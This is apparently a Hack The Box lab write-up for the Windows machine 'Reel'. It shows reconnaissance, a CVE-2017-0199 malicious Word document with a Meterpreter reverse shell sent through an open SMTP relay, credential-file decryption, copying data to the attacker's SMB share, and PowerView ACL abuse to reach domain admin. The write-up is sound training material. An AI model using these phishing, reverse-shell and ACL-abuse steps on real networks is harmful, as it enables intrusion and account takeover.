# HTB - Reel

<figure><img src="/files/4leMcdR2V7xjuLGEXbJK" alt=""><figcaption></figcaption></figure>

## Machine Info

Reel is a medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.

## Enumeration

**Scope**

> IP Address: 10.10.10.77

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE      REASON
21/tcp  open  ftp          syn-ack
22/tcp  open  ssh          syn-ack
25/tcp  open  smtp         syn-ack
135/tcp open  msrpc        syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p 21,22,25,135,139,445 -sCV $ip -Pn -oN Nmap/script-scan

PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp  open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp  open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds 
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-07-12T12:48:32+01:00
| smb2-time: 
|   date: 2024-07-12T11:48:30
|_  start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
```

```
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6 
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
```

**FTP Enumeration**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

<snip>
FINISHED --2024-07-12 07:48:01--
Total wall clock time: 3.0s
Downloaded: 5 files, 17K in 0.2s (75.3 KB/s)
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls                
10.10.10.77  Nmap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77     
10.10.10.77
└── documents
    ├── AppLocker.docx
    ├── Windows Event Forwarding.docx
    └── readme.txt
```

I downloaded these files but found nothing interesting in their contents, except for the email address of the creator of these files, `nico@megabank.com`, which sits in the document properties rather than in the visible text.

<figure><img src="/files/2PLBO8Gyps0miAmXydmT" alt=""><figcaption></figcaption></figure>
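The author address above comes from the OOXML metadata (`docProps/core.xml` inside the `.docx` zip), not from the document body. The following script, added here as an example and not part of the original write-up, extracts the `creator` and `lastModifiedBy` properties from any `.docx`/`.xlsx`/`.pptx` and pulls e-mail addresses out of them; `make_sample_docx` builds a constructed minimal document for offline testing, and the metadata values it uses are made up for the example.

```python
import io
import re
import sys
import xml.etree.ElementTree as ET
import zipfile

# XML namespaces used by docProps/core.xml in every OOXML container.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def author_fields(docx_bytes: bytes) -> dict:
    """Return the creator / lastModifiedBy properties of an OOXML document.

    The document is a zip archive; authoring metadata lives in docProps/core.xml,
    which is why reading the visible text alone misses it.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/core.xml"))
    fields = {}
    for key, xpath in (("creator", "dc:creator"), ("lastModifiedBy", "cp:lastModifiedBy")):
        node = root.find(xpath, NS)
        if node is not None and node.text:
            fields[key] = node.text.strip()
    return fields


def emails_in(fields: dict) -> set:
    """Pull anything that looks like an e-mail address out of the metadata values."""
    return {m for value in fields.values() for m in EMAIL_RE.findall(value)}


def make_sample_docx(creator: str, modifier: str, with_core: bool = True) -> bytes:
    """Constructed test input: a minimal zip carrying only docProps/core.xml."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        '<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>'
        '</cp:coreProperties>'
    ) % (NS["cp"], NS["dc"], creator, modifier)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder, enough for a valid zip
        if with_core:
            z.writestr("docProps/core.xml", core)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python3 docx_meta.py 10.10.10.77/documents/*.docx
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            meta = author_fields(fh.read())
        print(path, meta, sorted(emails_in(meta)))
```

`exiftool` shows the same fields, but a ten-line parser is handy in environments where it is not installed and makes clear which member of the zip the data actually comes from.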

**RPC Enumeration**

`rpcclient` returns nothing over a null session:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip                          
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
```

**SMB Enumeration**

Shares cannot be listed anonymously with `smbclient` or `crackmapexec`, and the `guest` account is disabled:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available  


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB         10.10.10.77     445    REEL             [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.77     445    REEL             [+] HTB.LOCAL\: 
SMB         10.10.10.77     445    REEL             [-] Error enumerating shares: STATUS_ACCESS_DENIED


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB         10.10.10.77     445    REEL             [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         10.10.10.77     445    REEL             [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED 
```

**SMTP Enumeration**

Whenever I find an SMTP server I check whether it is an open relay, i.e. whether it accepts mail from and to domains it does not host. An open relay lets us send arbitrary emails with a spoofed sender, which is exactly what a phishing attack needs.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
```

## Initial Access

### Shell as nico

I got a hint from the community that there is a CVE affecting Microsoft Office that allows RCE via a malicious document: `CVE-2017-0199`, a flaw in the handling of OLE2Link objects. A crafted document makes Word fetch a remote HTA file and hand it to `mshta.exe`, which executes it, so simply opening the attachment gives code execution.

Since the SMTP server is an open relay, we can craft such a document and send it to `nico` through that server; if the attachment is opened, we get remote code execution.

There is a Metasploit module that generates the malicious document and serves the HTA it points to. The target must be able to reach us on `SRVHOST:SRVPORT` for the HTA and on `LHOST:LPORT` for the Meterpreter stage, which is why both are set to the VPN interface `tun0` below:

```bash
msf6 > search CVE-2017-0199

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/office_word_hta  2017-04-14       excellent  No     Microsoft Office Word Malicious Hta Execution

msf6 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/fileformat/office_word_hta) > options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.doc          yes       The file name.
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local mac
                                        hine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.16.7:4444 
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
```

Send the email to the user we found with the `sendemail` command, attaching the document generated by Metasploit and using the target itself as the SMTP server (`-s $ip`):

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip 

Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
```

In Metasploit I got a connection back as the `nico` user

```bash
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400

msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HTB\nico
```

Get the flag from user's desktop

```bash
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt

4b1fa88985d787becfxxxxxxxxxxxxxx
```

> User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx

## Privilege Escalation

### **Shell as Tom**

```powershell
C:\Users\nico>tree /F

Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
       cred.xml
       user.txt
<snip>
```

It's a PowerShell credential file: a `PSCredential` object saved with `Export-Clixml`. The password inside is a `SecureString` that `Export-Clixml` protects with DPAPI under the saving user's key, so it can only be decrypted by `nico` on this machine, which is exactly the context our shell runs in.

<figure><img src="/files/c4C7Iol5eYvKMpiInmtL" alt=""><figcaption></figcaption></figure>

Nothing special is needed to read it: `Import-Clixml` rebuilds the credential object and `GetNetworkCredential()` exposes the plaintext password.

```PowerShell
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"

Tom
1ts-mag1c!!!
```

The only remote-access service exposed is `ssh` (OpenSSH 7.6 on port 22), so let's try Tom's credentials there:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh tom@$ip
tom@10.10.10.77's password:                                                                                                                                                     
tom@REEL C:\Users\tom> 
```

There are multiple interesting files in Tom's home directory; let's explore them

```powershell
tom@REEL C:\Users\tom>tree /F                                                                                               
C:.
├───Contacts
├───Desktop
│   └───AD Audit
│       │   note.txt
│       │
│       └───BloodHound
│           │   PowerView.ps1
│           │
│           └───Ingestors
│                   acls.csv
│                   BloodHound.bin
│                   BloodHound_Old.ps1
│                   SharpHound.exe
│                   SharpHound.ps1  
```

`Note.txt`

```PowerShell
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"                                                                          
Findings:                                                                                                                       
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).                                  

Maybe we should re-run Cypher query against other groups we've created.  
```

The other files are `PowerView.ps1`, which can be used to enumerate an AD environment and exploit misconfigurations, and `SharpHound.exe`, the BloodHound ingestor that collects information about the domain.

The most interesting file is `acls.csv`, the ACL export from that BloodHound collection. I copy it to my Kali machine after starting a local SMB server (e.g. Impacket's `smbserver.py share . -smb2support -username blind0bandit -password blind0bandit`, matching the credentials in the `net use` below):

```bash
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.                                                                                           
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:                                                  
1 file(s) copied.  
```

I opened the file and started exploring it manually, as uploading it to BloodHound failed for me (current BloodHound versions ingest JSON only, not this older CSV format).

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
```

* Searching for the user `tom`, I found the following:
  * user `tom` has `WriteOwner` on user `claire`
  * user `claire` has `WriteDacl` on group `Backup_Admins`

<figure><img src="/files/ialrXGoLKYie3q3M51Nq" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/S3vtniOyhgCvswCoEt8M" alt=""><figcaption></figcaption></figure>

* This is a potential path: take over the `claire` account, authenticate as her, and modify the ACL of `Backup_Admins` so that we can add ourselves to that group, which looks like a privileged one
* The `PowerView.ps1` already present on the machine is enough to execute this attack path
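The manual search above, and the note's remark about re-running the query against other groups, amount to a path search over the ACL graph. The script below is an added example, not part of the original write-up or of BloodHound: it parses `acls.csv`, keeps only allow ACEs that grant write-level control, and does a breadth-first search from a principal we control to a target object. The header row assumed here is the one written by the old BloodHound PowerShell ingestor (compare it with `head -1 acls.csv`; adjust the column names if yours differ), and the rows in `SAMPLE_ACLS_CSV` are constructed to mirror the two findings above plus the kinds of noise a real export contains (inherited ACEs, read-only rights, a deny ACE).

```python
import csv
import io
import sys
from collections import deque

# ACE rights that hand the principal control of the target object (write level),
# i.e. the same edge kinds BloodHound's shortest-path query follows.
ABUSABLE_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                   "WriteProperty", "ExtendedRight", "Owns"}

# Constructed rows in the column layout of the old BloodHound PowerShell ingestor.
SAMPLE_ACLS_CSV = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@HTB.LOCAL,USER,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,False
claire@HTB.LOCAL,USER,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,True
Backup_Admins@HTB.LOCAL,GROUP,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,False
Backup_Admins@HTB.LOCAL,GROUP,tom@HTB.LOCAL,USER,ReadProperty,,AccessAllowed,False
Backup_Admins@HTB.LOCAL,GROUP,tom@HTB.LOCAL,USER,GenericAll,,AccessDenied,False
tom@HTB.LOCAL,USER,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,True
"""


def load_edges(csv_text: str, include_inherited: bool = False) -> dict:
    """Build {principal: [(object, right), ...]} from allow ACEs with abusable rights.

    Deny ACEs grant nothing and are dropped. Inherited ACEs are dropped by default
    because they mostly belong to built-in groups (Domain Admins, SYSTEM) that we
    are not; pass include_inherited=True to see the full picture.
    """
    edges = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue
        if row["IsInherited"].strip().lower() == "true" and not include_inherited:
            continue
        # Some exports pack several rights into one cell ("GenericWrite, WriteDacl").
        rights = {r.strip() for r in row["ActiveDirectoryRights"].split(",")}
        for right in sorted(rights & ABUSABLE_RIGHTS):
            edges.setdefault(row["PrincipalName"].lower(), []).append(
                (row["ObjectName"].lower(), right))
    return edges


def outbound(edges: dict, principal: str) -> list:
    """Everything one principal can write to: the 'search for tom' step done by hand."""
    return sorted(edges.get(principal.lower(), []))


def find_path(edges: dict, start: str, target: str):
    """Breadth-first search from a principal we control to an object we want.

    Returns the hops as (source, right, destination) tuples, or None if the
    target is unreachable through write-level ACEs alone.
    """
    start, target = start.lower(), target.lower()
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, hops = queue.popleft()
        for obj, right in edges.get(node, []):
            path = hops + [(node, right, obj)]
            if obj == target:
                return path
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, path))
    return None


if __name__ == "__main__":
    # Usage: python3 aclpath.py acls.csv   (falls back to the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8-sig") as fh:
            text = fh.read()
    else:
        text = SAMPLE_ACLS_CSV
    graph = load_edges(text)
    print("tom controls:", outbound(graph, "tom@HTB.LOCAL"))
    for src, right, dst in find_path(graph, "tom@HTB.LOCAL", "Backup_Admins@HTB.LOCAL") or []:
        print(f"{src} -[{right}]-> {dst}")
```

On the sample data the search returns exactly the two-hop chain `tom -[WriteOwner]-> claire -[WriteDacl]-> Backup_Admins`; group membership is not in `acls.csv`, so a path that needs a `MemberOf` hop would have to be found with the other ingestor outputs.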

### **Shell as Claire**

Abuse `WriteOwner` to take ownership of the `claire` object; as owner we can modify its DACL and grant ourselves the right to reset her password. The commands below are PowerView cmdlets, run from Tom's SSH session after dot-sourcing the `PowerView.ps1` found in `Desktop\AD Audit\BloodHound` into a `powershell` session:

```powershell
set-domainobjectowner -Identity claire -OwnerIdentity tom
add-domainobjectacl -TargetIdentity claire -PrincipalIdentity tom -Rights Resetpassword
```

Change the password of the `claire` user

```powershell
$pass = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
set-domainuserpassword -identity claire -accountpassword $pass
```

Abuse `WriteDacl` to grant `claire` `GenericAll` (`-Rights All`) on the `Backup_Admins` group, giving full control over it. This step has to run in claire's security context (after logging in as her, or by passing her new credentials with `-Credential`), because the `WriteDacl` right belongs to her, not to tom:

```powershell
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Backup_admins" -PrincipalIdentity "htb.local\claire"
```

SSH in as `claire` and add her to the target group

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh claire@$ip
claire@10.10.10.77's password:

claire@REEL C:\Users\claire>    
```

```PowerShell
net group "backup_admins" claire /add
```

> You must log out and log in again for the new group membership to take effect (it is only added to your token at logon), and be fast, too :)

The `icacls` output below shows that `Backup_Admins` has full control (`F`) over the `Administrator` profile folder

```powershell
claire@REEL C:\Users>icacls Administrator                                                                                       
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
	HTB\Backup_Admins:(OI)(CI)(F)
	HTB\Administrator:(OI)(CI)(F)
	BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files  
```

I tried to read the flag, but access to it is still denied

```powershell
claire@REEL C:\Users\Administrator>type Desktop\root.txt
Access is denied. 
```

### **Shell as administrator**

Exploring the `Administrator` home directory shows several `.ps1` scripts

```PowerShell
claire@REEL C:\Users\Administrator>tree /F

├───Desktop
│   │   root.txt
│   │
│   └───Backup Scripts
│           backup.ps1
│           backup1.ps1
│           BackupScript.ps1
│           BackupScript.zip
│           folders-system-state.txt
│           test2.ps1.txt    
```

One of these files contains the admin password in plaintext

```PowerShell
claire@REEL C:\Users\Administrator>type "Desktop\Backup Scripts\BackupScript.ps1"

# admin password
$password="Cr4ckMexxxxxxxxx"
<snip>
```

And we have a shell as Administrator

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh administrator@$ip

administrator@10.10.10.77's password:                                                              
administrator@REEL C:\Users\Administrator>type Desktop\root.txt
e622958df7390059522xxxxxxxxxxxxxx
```

> Root Flag: e622958df7390059522xxxxxxxxxxxxxx

